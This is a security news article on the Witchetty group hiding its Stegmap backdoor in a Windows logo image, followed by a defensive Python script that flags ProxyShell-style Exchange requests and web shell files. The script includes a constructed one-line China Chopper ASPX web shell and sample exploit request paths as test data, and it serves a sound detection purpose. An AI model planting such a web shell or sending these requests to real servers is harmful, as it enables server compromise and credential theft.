Cyberattacks on Middle Eastern Governments Hide Malware in Windows Logo

An espionage-focused threat actor has been observed using a steganographic trick to conceal a previously undocumented backdoor in a Windows logo during its attacks on governments in the Middle East.

Broadcom’s Symantec Threat Hunter team attributed the updated tool to a hacking group it tracks as Witchetty, also known as LookingFrog, a subgroup operating under the TA410 umbrella.

Intrusions involving TA410 — which is believed to share connections with a Chinese threat group known as APT10 (aka Cicada, Stone Panda, or TA429) — primarily feature a modular implant called LookBack.

Symantec’s latest analysis of attacks between February and September 2022, in which the group targeted the governments of two Middle Eastern countries and the stock exchange of an African country, highlights the use of a new backdoor called Stegmap.

The new malware uses steganography, a technique for embedding a message (in this case, the malware itself) inside an innocuous-looking file, to extract malicious code from a bitmap image of an old Microsoft Windows logo hosted on a GitHub repository.

“Disguising the payload in this way allowed the attackers to host it on a free and trusted service,” the researchers said. “Downloads from trusted hosts such as GitHub are much less likely to raise red flags than downloads from an attacker-controlled command and control (C&C) server.”

Stegmap, like other backdoors, supports a wide range of operations: file manipulation, downloading and running executables, terminating processes, and modifying the Windows Registry.

The attacks leading to the deployment of Stegmap weaponize the ProxyLogon and ProxyShell vulnerabilities in Exchange Server to drop the China Chopper web shell, which is then used for credential theft and lateral movement before the LookBack malware is launched.
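The chain above (Exchange exploitation, then a web shell) leaves traces in the Exchange front-end IIS logs and on disk. As an added example that is not from Symantec's report, the script below runs two checks over constructed IIS W3C-style log lines: the publicly documented ProxyShell request shape (an Autodiscover request whose query carries an "@" and a backend virtual directory such as /powershell or /mapi/nspi), and POSTs to .aspx files under /aspnet_client/, a directory public Exchange incident write-ups repeatedly list as a web shell drop location and from which legitimate Exchange serves no pages. It also matches the widely reported one-line ASPX form of China Chopper in file contents. The IP addresses, timestamps and file sample are constructed; the backend list and directory list are the example's own assumptions and should be tuned to the environment.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C-style lines for illustration (not real telemetry).
# Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2022-03-01 10:01:12 203.0.113.5 GET /owa/auth/logon.aspx - 200
2022-03-01 10:02:40 203.0.113.5 POST /autodiscover/autodiscover.json @corp.example/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@corp.example 200
2022-03-01 10:02:58 203.0.113.5 POST /autodiscover/autodiscover.json @corp.example/powershell/?&Email=autodiscover/autodiscover.json%3F@corp.example 200
2022-03-01 10:03:05 203.0.113.5 POST /aspnet_client/system_web/help.aspx - 200
2022-03-01 10:05:22 198.51.100.9 GET /ecp/default.aspx - 302
2022-03-01 10:06:01 198.51.100.9 POST /owa/auth.owa - 302
"""

# Constructed file content in the widely reported one-line ASPX China Chopper form.
CHOPPER_SAMPLE = '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'

# Backend virtual directories a ProxyShell-style request reaches through Autodiscover
# (assumed list for the example; extend as needed).
BACKENDS = ("/powershell", "/mapi/nspi", "/ews", "/ecp", "/owa")

# Directories where web shells are commonly dropped per public write-ups (assumed list).
SHELL_DIRS = ("/aspnet_client/",)

CHOPPER_RE = re.compile(r'eval\s*\(\s*Request\.Item\[', re.IGNORECASE)


def check_line(line):
    """Return (rule, client ip, uri stem) for a suspicious log line, else None."""
    parts = line.split()
    if len(parts) < 7:
        return None
    _date, _time, ip, method, stem, query, _status = parts[:7]
    stem_l, query_l = stem.lower(), unquote(query).lower()
    if (stem_l.endswith("/autodiscover/autodiscover.json") and "@" in query_l
            and any(b in query_l for b in BACKENDS)):
        return ("proxyshell_path_confusion", ip, stem)
    if method == "POST" and stem_l.endswith(".aspx") and any(d in stem_l for d in SHELL_DIRS):
        return ("possible_webshell_post", ip, stem)
    return None


def scan(log_text):
    """Run check_line over every line; return [(line number, rule, ip, stem), ...]."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hit = check_line(line)
        if hit:
            findings.append((n,) + hit)
    return findings


def looks_like_china_chopper(text):
    """True if file content matches the one-line ASPX China Chopper pattern."""
    return CHOPPER_RE.search(text) is not None


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print("chopper sample flagged:", looks_like_china_chopper(CHOPPER_SAMPLE))
```

On a real server the log check runs over the HttpProxy logs on the Client Access front end, and the file check over every .aspx under the Exchange web roots; a match on either is a trigger for full disk and credential triage rather than a self-contained verdict, since the same access also enables the credential theft and lateral movement the article describes.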

A timeline of an intrusion at a government agency in the Middle East shows that Witchetty maintained remote access for six months and carried out a wide range of post-exploitation activity, including network enumeration and installation of custom malware, until September 1, 2022.

“Witchetty has demonstrated the ability to continually refine and refresh its toolset to compromise targets of interest,” the researchers said.

“Exploitation of vulnerabilities on public servers provides it with a pathway into organizations, while custom tools coupled with skillful use of living-off-the-land tactics allow it to maintain a long-term persistent presence in targeted organizations.”